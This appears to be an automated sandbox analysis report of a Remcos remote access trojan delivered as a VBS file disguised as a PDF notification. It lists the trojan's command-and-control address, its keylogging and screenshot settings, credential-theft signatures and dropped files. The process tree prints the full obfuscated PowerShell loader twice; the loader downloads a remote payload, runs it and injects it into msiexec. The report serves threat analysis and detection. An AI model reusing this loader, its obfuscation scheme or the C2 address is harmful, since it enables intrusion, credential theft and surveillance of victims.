Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 08:12

General

  • Target

    Bunker Notification_pdf.vbs

  • Size

    38KB

  • MD5

    da585c076f85367266cc0c6278863775

  • SHA1

    5f20adced6dcac42336a587c4c99036098f75691

  • SHA256

    1bd7e51b56b53d6522565bee13bf0fe855b27ff37cddcc4d71cfced82e01e86f

  • SHA512

    da39a7bb7d92eadcd50b06d6c12cf9f10b4e5aa3ec6a201984f41556ea9825948ec03cc1a47c07ba7fb50169b9eb3d95fb7bc1efa78b54c7ac180723ef95cb52

  • SSDEEP

    768:CJLtBS6wlVggNDAAE1yU2QLIeG34mMEeVMSjBLf20KnHtTkoi3zToBEWLuJP:CJJBSxNDlE1y8Lps4mMEXSlLf54koiXJ

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.18.214:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-AOD6MB

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bunker Notification_pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious use of WriteProcessMemory
    PID:3736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#subbasal sugerrs Neutrodyne Russophobia Cockneyernes Flatlets Foderalerne #><#Forvorpen exanimated Kanaljers #>$streptococci='Unsubmissive';function svingtud($Restskatters){If ($host.DebuggerEnabled) {$Corymbose36=3} for ($shaper=$Corymbose36;;$shaper+=4){if(!$Restskatters[$shaper]) { break }$Potentizes+=$Restskatters[$shaper]}$Potentizes}function uafladelige($Hepatomas){ .($saxonic) ($Hepatomas)}$Anthorine=svingtud 'HaeN.asENont nd.b jwPe,EOspbGerC KiLCreI Che Nun,nit';$Overkommer=svingtud 'ArbM.naoKiszC eiAsslIlll kmaKli/';$Mrkbare=svingtud 'R cTRuml fosHym1I.d2';$Knurre='Ted[ idn u e elt Al. AsssylEGraRkamVmonIDruc naEConpPeaOAflipron MaT AdmPreAHoensquaU.sGP ieTolrDob]Utr: Id: BlscogEOp CTeru P R miIbarTCery OuPLi.r,oro D,tdepo OxcD,uOsecl Op=Hgt$tr,mArvRN tk O.BRouALarrslae';$Overkommer+=svingtud 'Myr5Udf.afs0Co, Red(M rWchiisugnRa dBlooshewsigsgen sigN c T Ps Fje1sum0Rec.Jus0Rap;Brn onWspiiHinnFro6Cam4Jor;Lym Hux ag6Kad4Mol;skr My rArcv s :An 1Vi 3 ru1 .k.Jog0 T )Aut OdlG sleErgc orksemoFor/ sw2 Ch0Unr1Bid0Uls0Udl1Hoo0Ang1 et stvFHstiBarr KeeYeofEdioB exFol/ Pa1 .o3Enl1 ep.Rea0';$Fremlejens=svingtud 'bloUFa.sParEIntROms-GrnADasg,ule BrN MeT';$skravl=svingtud ' AnhEpit act Dep acsN n:H b/Bu,/.ozbUnf9Ruta s 1Be . sti Enclodusko/ douMoiLNonhCheD reGsovgKomaHalY ka/ peTv.ra gguLadtFr nD peBetsChos o,.FritDe hRefn';$shaperntimiteterne=svingtud 'Du,>';$saxonic=svingtud 's ri ,hEHenX';$Anbringendernes184='Restanternes166';$Afsindiges='\Busbaner195.Odo';uafladelige (svingtud 'In,$D.gG flLberOKomBs ea MrlPe : PrsHa.e oG emgWorIHirO C =Mng$UncE senKhwvNon:,usaun pEftPGondHerAAnttFe,aAfk+sub$Br AUriFDeisBugiPolNTrad oaiEx,g VeE Efs');uafladelige (svingtud ' K $ Fag s.lPetODedbsoyaPosLEol: shVAprK hisChat Usc Vie Udn atPa,rBerE Un= l$FonsTyekskrRUm aElevFd.LBun. s,ss oP PoL WhI ortste(Afk$OpssConhUdsaBraPNogEs kr ennUnitAttI TeM ,yIAvntAn.eTritRe EPe.rPornReae h)');uafladelige (svingtud $Knurre);$skravl=$Vkstcentre[0];$Abounds=(svingtud ' Ci$ AfGBonL,osO Hub.kea Pol ac: sinsanoAngr.esM BaA DrlsictCome Pam oPs.eespiRch aA etstouA tREn ELu N AcsJ u=D sNReeeQuiwsam-FasovicBsekJArtespaCstot ,n PlesIndY nhsP aTImbese mPar. Bo$Drua GanPriTUreHRacOLe RColI MnNLarE');uafladelige ($Abounds);uafladelige (svingtud ' a$PerN.ndospirEqum Fna .il BetCone .amst.p cheBakrLysasiltP ruPaar L eskanNonsInd.IncHUnce Tyar,ld ouemusr RysGra[Han$UdsFPserhkle FomsiplP oeElejO leClon sts Ci]si =spo$IntOswevkale TwrDelk ruo DemUl mN.te Bar');$successorer62=svingtud 'Pre$.otNspeo LnrdsimCiraDell CatAxieBedmKikpMuce Her Cha Pot Rrutotr orestrn H,s sa. dpD Cho PhwPronstrlPeroNonaUdkdFraFRosi nll,neeNyd(Pro$Blgs ek ecr Flasnov atl,om,Tum$staB FooPanpAntl Tve OvnOph1.ar0 Ge0Alb)';$Boplen100=$seggio;uafladelige (svingtud ' Ga$AelG A lI tOChab rA ThlEd.:Jult A AHugNDi ITvaAO lsFer=I,c(ForTPeieArrsisoT.is- isPNonA ut HeH Ud Ops$ isbF cO rpFreL liEDucNRet1rou0s n0Pal)');while (!$Tanias) {uafladelige (svingtud 'Pro$TorgRadlscoo NubRegaOctl st:sydLseleInsdAnkdEp e Blldisssolt a=Ob $YanY areRess V.esebs') ;uafladelige $successorer62;uafladelige (svingtud 'Nonss,dTOrpAskarschTUnh-Hyls saL eve .ie.ouPCoc Mu4');uafladelige (svingtud 'Af $BolGBi LPriO rebWe A Tilne :Tr TTalastanAfliTjrA Pes Ka=,il(TiltCa eMegsschtAsa-RhaPd dANe t hihP e Mo$.leBsocO RepI fL F.estrNUnt1 In0sip0Dub)') ;uafladelige (svingtud 'Far$s rG haLGyaOsytBVenaNaal so: anmMedEGasTstaAEkssYd,T LeEO tR henFeaAsubLKom=Haz$ GegKnfLMaioOpfBopkA Pal,il:UarsBamABrumTitMLites rNPr,sAu PGeraVelrLat+All+Aft%sga$paavsvak rnstr Tstec HeePten PrTC mrUd.EG.a. kkc OkOAzou jnGlat') ;$skravl=$Vkstcentre[$Metasternal]}$shaperrreducibilities=281291;$Euforiseringens=29073;uafladelige (svingtud 'ste$ taGsneLPo,o muB,faA.raLCha:sc s,mslOveuso.tBeddsjaIPalsVksPspio aan oreRacrsamiV dnUntG ipEChaRUdmNLiseCzasMob L.t=G.g Ga gstee EutBat-CoucAteOGriNA rtEpieTeln,umtFlo wef$O eb OvOGasP KaLAfmE,reNAnt1Ud,0Pks0');uafladelige (svingtud 'Lin$FregKerlForoB.sbCenaPrelBes:UndsTilkKnoy feg ungDire InrMo nKare .osJet Rho=Rea Pa [ab sR syautsLegt F eArim Ma.V.lC M,oHofnVehva ne A rContMoo]Des:Dob:R nF sar kloConmBemBsana.xys ske sa6Lad4 nesCl,tE.orProiBagn R.gFis(Pav$IndsstnlYamusl tTildseeistusForpKleoMohn ree AnrOpei ivnrengB lesu,rAnknswieLyss b,)');uafladelige (svingtud 'Era$myogs hlRhaoUngBVakAstrlTid:MusR eeELiklM lA,cets.lI rrVMatEYelTBak Coy= Pl B.c[seps AfyNonsMisTForenermBo..su tJorEDy,XT btf.m. .ue,otnAntc KvoAs DMuli unOveGGud] Tl:Iph:MidA mesTrockloi GuICou. sag.uge rutEkssschtPrersa.iHjdNMaug je(Ves$strssn,KArryArbG dG.ncEs rRTeaNanseskas .s)');uafladelige (svingtud 'Cat$.ouGol,LOveoBatb roAFisLsu.: rROffI DiCDepEH ab U.IMi rKonDBors Va=Rus$MedR TrE Exl PyARetTGt ITr vsvre bbtPas. ris,oru ytb,dmsBryTPter ntiWioNGy g Am( Kr$Tyrs teh vaAforp,orEAnkRIodRTisRRe esrvdskiuUnmcTraIMe B,iaIRekLAmiIUtat lIs,iE UbsGar,Put$GelEEsmuOveFUdsORivrNyoi kosac eA yrAu.I seN DeG,ygeserNWhis t)');uafladelige $Ricebirds;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1168
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#subbasal sugerrs Neutrodyne Russophobia Cockneyernes Flatlets Foderalerne #><#Forvorpen exanimated Kanaljers #>$streptococci='Unsubmissive';function svingtud($Restskatters){If ($host.DebuggerEnabled) {$Corymbose36=3} for ($shaper=$Corymbose36;;$shaper+=4){if(!$Restskatters[$shaper]) { break }$Potentizes+=$Restskatters[$shaper]}$Potentizes}function uafladelige($Hepatomas){ .($saxonic) ($Hepatomas)}$Anthorine=svingtud 'HaeN.asENont nd.b jwPe,EOspbGerC KiLCreI Che Nun,nit';$Overkommer=svingtud 'ArbM.naoKiszC eiAsslIlll kmaKli/';$Mrkbare=svingtud 'R cTRuml fosHym1I.d2';$Knurre='Ted[ idn u e elt Al. AsssylEGraRkamVmonIDruc naEConpPeaOAflipron MaT AdmPreAHoensquaU.sGP ieTolrDob]Utr: Id: BlscogEOp CTeru P R miIbarTCery OuPLi.r,oro D,tdepo OxcD,uOsecl Op=Hgt$tr,mArvRN tk O.BRouALarrslae';$Overkommer+=svingtud 'Myr5Udf.afs0Co, Red(M rWchiisugnRa dBlooshewsigsgen sigN c T Ps Fje1sum0Rec.Jus0Rap;Brn onWspiiHinnFro6Cam4Jor;Lym Hux ag6Kad4Mol;skr My rArcv s :An 1Vi 3 ru1 .k.Jog0 T )Aut OdlG sleErgc orksemoFor/ sw2 Ch0Unr1Bid0Uls0Udl1Hoo0Ang1 et stvFHstiBarr KeeYeofEdioB exFol/ Pa1 .o3Enl1 ep.Rea0';$Fremlejens=svingtud 'bloUFa.sParEIntROms-GrnADasg,ule BrN MeT';$skravl=svingtud ' AnhEpit act Dep acsN n:H b/Bu,/.ozbUnf9Ruta s 1Be . sti Enclodusko/ douMoiLNonhCheD reGsovgKomaHalY ka/ peTv.ra gguLadtFr nD peBetsChos o,.FritDe hRefn';$shaperntimiteterne=svingtud 'Du,>';$saxonic=svingtud 's ri ,hEHenX';$Anbringendernes184='Restanternes166';$Afsindiges='\Busbaner195.Odo';uafladelige (svingtud 'In,$D.gG flLberOKomBs ea MrlPe : PrsHa.e oG emgWorIHirO C =Mng$UncE senKhwvNon:,usaun pEftPGondHerAAnttFe,aAfk+sub$Br AUriFDeisBugiPolNTrad oaiEx,g VeE Efs');uafladelige (svingtud ' K $ Fag s.lPetODedbsoyaPosLEol: shVAprK hisChat Usc Vie Udn atPa,rBerE Un= l$FonsTyekskrRUm aElevFd.LBun. s,ss oP PoL WhI ortste(Afk$OpssConhUdsaBraPNogEs kr ennUnitAttI TeM ,yIAvntAn.eTritRe EPe.rPornReae h)');uafladelige (svingtud $Knurre);$skravl=$Vkstcentre[0];$Abounds=(svingtud ' Ci$ AfGBonL,osO Hub.kea Pol ac: sinsanoAngr.esM BaA DrlsictCome Pam oPs.eespiRch aA etstouA tREn ELu N AcsJ u=D sNReeeQuiwsam-FasovicBsekJArtespaCstot ,n PlesIndY nhsP aTImbese mPar. Bo$Drua GanPriTUreHRacOLe RColI MnNLarE');uafladelige ($Abounds);uafladelige (svingtud ' a$PerN.ndospirEqum Fna .il BetCone .amst.p cheBakrLysasiltP ruPaar L eskanNonsInd.IncHUnce Tyar,ld ouemusr RysGra[Han$UdsFPserhkle FomsiplP oeElejO leClon sts Ci]si =spo$IntOswevkale TwrDelk ruo DemUl mN.te Bar');$successorer62=svingtud 'Pre$.otNspeo LnrdsimCiraDell CatAxieBedmKikpMuce Her Cha Pot Rrutotr orestrn H,s sa. dpD Cho PhwPronstrlPeroNonaUdkdFraFRosi nll,neeNyd(Pro$Blgs ek ecr Flasnov atl,om,Tum$staB FooPanpAntl Tve OvnOph1.ar0 Ge0Alb)';$Boplen100=$seggio;uafladelige (svingtud ' Ga$AelG A lI tOChab rA ThlEd.:Jult A AHugNDi ITvaAO lsFer=I,c(ForTPeieArrsisoT.is- isPNonA ut HeH Ud Ops$ isbF cO rpFreL liEDucNRet1rou0s n0Pal)');while (!$Tanias) {uafladelige (svingtud 'Pro$TorgRadlscoo NubRegaOctl st:sydLseleInsdAnkdEp e Blldisssolt a=Ob $YanY areRess V.esebs') ;uafladelige $successorer62;uafladelige (svingtud 'Nonss,dTOrpAskarschTUnh-Hyls saL eve .ie.ouPCoc Mu4');uafladelige (svingtud 'Af $BolGBi LPriO rebWe A Tilne :Tr TTalastanAfliTjrA Pes Ka=,il(TiltCa eMegsschtAsa-RhaPd dANe t hihP e Mo$.leBsocO RepI fL F.estrNUnt1 In0sip0Dub)') ;uafladelige (svingtud 'Far$s rG haLGyaOsytBVenaNaal so: anmMedEGasTstaAEkssYd,T LeEO tR henFeaAsubLKom=Haz$ GegKnfLMaioOpfBopkA Pal,il:UarsBamABrumTitMLites rNPr,sAu PGeraVelrLat+All+Aft%sga$paavsvak rnstr Tstec HeePten PrTC mrUd.EG.a. kkc OkOAzou jnGlat') ;$skravl=$Vkstcentre[$Metasternal]}$shaperrreducibilities=281291;$Euforiseringens=29073;uafladelige (svingtud 'ste$ taGsneLPo,o muB,faA.raLCha:sc s,mslOveuso.tBeddsjaIPalsVksPspio aan oreRacrsamiV dnUntG ipEChaRUdmNLiseCzasMob L.t=G.g Ga gstee EutBat-CoucAteOGriNA rtEpieTeln,umtFlo wef$O eb OvOGasP KaLAfmE,reNAnt1Ud,0Pks0');uafladelige (svingtud 'Lin$FregKerlForoB.sbCenaPrelBes:UndsTilkKnoy feg ungDire InrMo nKare .osJet Rho=Rea Pa [ab sR syautsLegt F eArim Ma.V.lC M,oHofnVehva ne A rContMoo]Des:Dob:R nF sar kloConmBemBsana.xys ske sa6Lad4 nesCl,tE.orProiBagn R.gFis(Pav$IndsstnlYamusl tTildseeistusForpKleoMohn ree AnrOpei ivnrengB lesu,rAnknswieLyss b,)');uafladelige (svingtud 'Era$myogs hlRhaoUngBVakAstrlTid:MusR eeELiklM lA,cets.lI rrVMatEYelTBak Coy= Pl B.c[seps AfyNonsMisTForenermBo..su tJorEDy,XT btf.m. .ue,otnAntc KvoAs DMuli unOveGGud] Tl:Iph:MidA mesTrockloi GuICou. sag.uge rutEkssschtPrersa.iHjdNMaug je(Ves$strssn,KArryArbG dG.ncEs rRTeaNanseskas .s)');uafladelige (svingtud 'Cat$.ouGol,LOveoBatb roAFisLsu.: rROffI DiCDepEH ab U.IMi rKonDBors Va=Rus$MedR TrE Exl PyARetTGt ITr vsvre bbtPas. ris,oru ytb,dmsBryTPter ntiWioNGy g Am( Kr$Tyrs teh vaAforp,orEAnkRIodRTisRRe esrvdskiuUnmcTraIMe B,iaIRekLAmiIUtat lIs,iE UbsGar,Put$GelEEsmuOveFUdsORivrNyoi kosac eA yrAu.I seN DeG,ygeserNWhis t)');uafladelige $Ricebirds;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pesmophwwodyba"
        3⤵
          PID:1516
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pesmophwwodyba"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2236
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ayyepisqkwvlmoqgl"
          3⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:3280
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cadpqadsyenqovmkdppo"
          3⤵
            PID:2200
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cadpqadsyenqovmkdppo"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1876

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        806286a9ea8981d782ba5872780e6a4c

        SHA1

        99fe6f0c1098145a7b60fda68af7e10880f145da

        SHA256

        cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

        SHA512

        362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bkupywdz.3ns.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\pesmophwwodyba

        Filesize

        4KB

        MD5

        562a58578d6d04c7fb6bda581c57c03c

        SHA1

        12ab2b88624d01da0c5f5d1441aa21cbc276c5f5

        SHA256

        ff5c70287ba432a83f9015209d6e933462edca01d68c53c09882e1e4d22241c8

        SHA512

        3f6e19faa0196bd4c085defa587e664abdd63c25ef30df8f4323e60a5a5aca3cd2709466f772e64ab00fe331d4264841422d6057451947f3500e9252a132254e

      • C:\Users\Admin\AppData\Roaming\Busbaner195.Odo

        Filesize

        404KB

        MD5

        e640d575f116fa96231b21a13e947fff

        SHA1

        5c6a64428ab9476109c11485d99aab34cbc65826

        SHA256

        c06a9036d4a7ff15f0520c93ac0446611a2a0baf3114de595ad61e42adc507fd

        SHA512

        c9e7d42e8e1113309d9c4db52cd0b0e67272ca11033aec6e685506e702d445d8c721d0ca40257413f246d256545e63ce89747b9f08dcf1bea7ffd88fb04b9067

      • memory/1016-56-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-81-0x0000000023D00000-0x0000000023D19000-memory.dmp

        Filesize

        100KB

      • memory/1016-74-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-89-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-88-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-87-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-86-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-85-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-84-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-48-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-80-0x0000000023D00000-0x0000000023D19000-memory.dmp

        Filesize

        100KB

      • memory/1016-77-0x0000000023D00000-0x0000000023D19000-memory.dmp

        Filesize

        100KB

      • memory/1016-83-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1016-82-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

      • memory/1168-19-0x00007FFB41BF0000-0x00007FFB426B1000-memory.dmp

        Filesize

        10.8MB

      • memory/1168-4-0x00007FFB41BF3000-0x00007FFB41BF5000-memory.dmp

        Filesize

        8KB

      • memory/1168-15-0x00007FFB41BF0000-0x00007FFB426B1000-memory.dmp

        Filesize

        10.8MB

      • memory/1168-5-0x000002096C130000-0x000002096C152000-memory.dmp

        Filesize

        136KB

      • memory/1168-16-0x00007FFB41BF0000-0x00007FFB426B1000-memory.dmp

        Filesize

        10.8MB

      • memory/1168-22-0x00007FFB41BF0000-0x00007FFB426B1000-memory.dmp

        Filesize

        10.8MB

      • memory/1876-65-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/1876-72-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/1876-73-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/2164-40-0x0000000006290000-0x00000000062DC000-memory.dmp

        Filesize

        304KB

      • memory/2164-44-0x0000000007410000-0x0000000007432000-memory.dmp

        Filesize

        136KB

      • memory/2164-41-0x0000000007890000-0x0000000007F0A000-memory.dmp

        Filesize

        6.5MB

      • memory/2164-24-0x0000000005360000-0x0000000005988000-memory.dmp

        Filesize

        6.2MB

      • memory/2164-25-0x0000000005330000-0x0000000005352000-memory.dmp

        Filesize

        136KB

      • memory/2164-26-0x0000000005A10000-0x0000000005A76000-memory.dmp

        Filesize

        408KB

      • memory/2164-23-0x0000000004C70000-0x0000000004CA6000-memory.dmp

        Filesize

        216KB

      • memory/2164-27-0x0000000005AF0000-0x0000000005B56000-memory.dmp

        Filesize

        408KB

      • memory/2164-39-0x0000000006200000-0x000000000621E000-memory.dmp

        Filesize

        120KB

      • memory/2164-47-0x0000000008A70000-0x000000000DFE2000-memory.dmp

        Filesize

        85.4MB

      • memory/2164-45-0x00000000084C0000-0x0000000008A64000-memory.dmp

        Filesize

        5.6MB

      • memory/2164-33-0x0000000005BE0000-0x0000000005F34000-memory.dmp

        Filesize

        3.3MB

      • memory/2164-43-0x00000000074B0000-0x0000000007546000-memory.dmp

        Filesize

        600KB

      • memory/2164-42-0x0000000006770000-0x000000000678A000-memory.dmp

        Filesize

        104KB

      • memory/2236-64-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2236-62-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2236-67-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2236-60-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/3280-61-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/3280-66-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/3280-68-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB